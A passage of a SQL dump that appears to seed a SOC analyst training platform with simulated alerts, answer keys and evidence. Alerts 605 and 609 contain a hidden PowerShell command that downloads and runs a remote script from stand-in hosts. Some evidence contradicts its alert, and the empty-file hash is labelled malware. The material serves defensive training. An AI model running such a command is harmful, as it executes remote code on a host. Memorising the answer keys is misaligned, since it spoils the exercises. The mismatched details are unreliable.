2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.54\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"port\\\":443,\\\"filename\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"encryption\\\":\\\"TLS\\\",\\\"alert_id\\\":\\\"EXFIL-12345\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.238Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.54\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"port\\\":443,\\\"filename\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"encryption\\\":\\\"TLS\\\",\\\"alert_id\\\":\\\"EXFIL-12345\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.238Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.54\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"port\\\":443,\\\"filename\\\":\\\"customer_data_backup.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"encryption\\\":\\\"TLS\\\",\\\"alert_id\\\":\\\"EXFIL-12345\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(601, 'Brute Force Attack Detected on Corporate Server', 'high', 'Splunk', 'Multiple failed login attempts detected from a suspicious foreign IP address targeting the corporate server. This indicates a possible brute force attack.', 'Brute Force', 'T1110', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-11T08:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"45.67.89.123\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"corp-server-01\",\"failed_attempts\":34}', '2026-01-11 14:04:23', '2026-03-07 11:50:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.67.89.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a known malicious IP strongly indicates a brute force attempt.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.239Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"45.67.89.123\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":34}\"},{\"timestamp\":\"2026-02-01T20:31:22.239Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"45.67.89.123\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":34}\"},{\"timestamp\":\"2026-02-01T20:30:22.239Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"45.67.89.123\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":34}\"},{\"timestamp\":\"2026-02-01T20:29:22.239Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"45.67.89.123\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":34}\"},{\"timestamp\":\"2026-02-01T20:28:22.239Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"45.67.89.123\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":34}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(602, 'Malware Detected via Suspicious Process Execution', 'critical', 'CrowdStrike', 'A known malware file was executed on a company workstation. The file hash matches a sample with widespread detection on VirusTotal.', 'Malware', 'T1059', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.22\",\"username\":\"jdoe\",\"hostname\":\"workstation-55\",\"command_line\":\"C:\\\\malware\\\\bad.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 14:04:23', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 60 security vendors\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Execution of a file with a known malicious hash indicates a malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(603, 'Phishing Email Containing Malicious URL', 'high', 'Proofpoint', 'A phishing email containing a malicious URL was received. The URL is known for hosting malware.', 'Phishing', 'T1566', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:05:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.50\",\"username\":\"jsmith\",\"hostname\":\"mail-server-01\",\"email_sender\":\"spoofed@malicious.com\",\"url\":\"http://bad-url.com\"}', '2026-01-11 14:04:23', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"spoofed@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Email address associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://bad-url.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts known malware\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a malicious URL in the email indicates a phishing attempt aimed at compromising user credentials.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Containing Malicious URL\",\"date\":\"2026-02-01T20:32:22.241Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(604, 'False Positive: Legitimate User Activity Mistaken for Malicious', 'low', 'Firewall', 'A legitimate user accessing an external service was flagged as suspicious due to an incorrect firewall rule.', 'Network Traffic', 'T1040', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"104.26.2.33\",\"username\":\"mgomez\",\"hostname\":\"laptop-34\",\"domain\":\"example.com\"}', '2026-01-11 14:04:23', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"104.26.2.33\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Reputable domain with no malicious history\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_traffic\",\"analysis_notes\":\"The connection was flagged due to an overly restrictive firewall rule, not because of any real threat.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(605, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A PowerShell command was executed on the host which is commonly associated with malicious activity. The command attempts to download a file from an external IP address.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-01\",\"command_line\":\"powershell.exe -nop -w hidden -c \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.45/malicious.ps1\')\\\"\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnop3456\",\"domain\":\"malicious-site.com\"}', '2026-01-11 14:05:25', '2026-02-22 14:52:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 123 times for hosting malicious scripts\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnop3456\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in 5/5 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.45/malicious.ps1\')\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command pattern associated with fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command and the external IP address are both indicators of a malicious activity. 
Immediate action is required.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(606, 'Failed Login Attempts from Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts detected from an external IP address, indicating a possible brute force attack.', 'Brute Force', 'T1078', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-11T03:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.25\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"WEB-SERVER-01\",\"failed_attempts\":35}', '2026-01-11 14:05:25', '2026-03-05 05:19:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Common username targeted in brute force attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a foreign IP address indicates a likely brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.244Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:31:22.244Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:30:22.244Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:29:22.244Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:28:22.244Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(607, 'Phishing Email with Malicious URL Detected', 'high', 'Proofpoint', 'A phishing email was received containing a malicious URL, attempting to trick the user into visiting a fake login page.', 'Phishing', 'T1566', 1, 'Closed', 34, '{\"timestamp\":\"2026-01-11T08:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"10.0.0.15\",\"username\":\"asmith\",\"hostname\":\"MAIL01\",\"email_sender\":\"no-reply@fakesite.com\",\"url\":\"http://fakesite.com/login\"}', '2026-01-11 14:05:25', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fakesite.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known for hosting phishing pages\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"no-reply@fakesite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered, associated with phishing\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a malicious URL leading to a phishing page. 
The sender\'s domain is not legitimate.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL Detected\",\"date\":\"2026-02-01T20:32:22.245Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(608, 'Unusual Login Activity Detected from Known VPN Provider', 'low', 'Wazuh', 'A login attempt was detected from an IP address associated with a known VPN provider. The activity appears benign after further investigation.', 'Suspicious Login', 'T1078', 0, 'resolved', 189, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.0.2.10\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jsmith\",\"hostname\":\"LAPTOP-02\"}', '2026-01-11 14:05:25', '2026-02-22 15:15:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with benign VPN provider\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is associated with a legitimate VPN provider, and the login activity matches a known user\'s behavior.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.246Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.0.2.10\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.246Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.0.2.10\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.246Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.0.2.10\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.246Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.0.2.10\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.246Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.0.2.10\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(609, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A suspicious PowerShell script was executed on an internal machine. This script is known to download additional malware.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"command_line\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com\')\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\"}', '2026-01-11 01:10:03', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, not exposed to the internet.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com\')\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known malicious PowerShell command to download and execute scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware campaigns.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command is a known indicator of compromise for malware download and execution.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
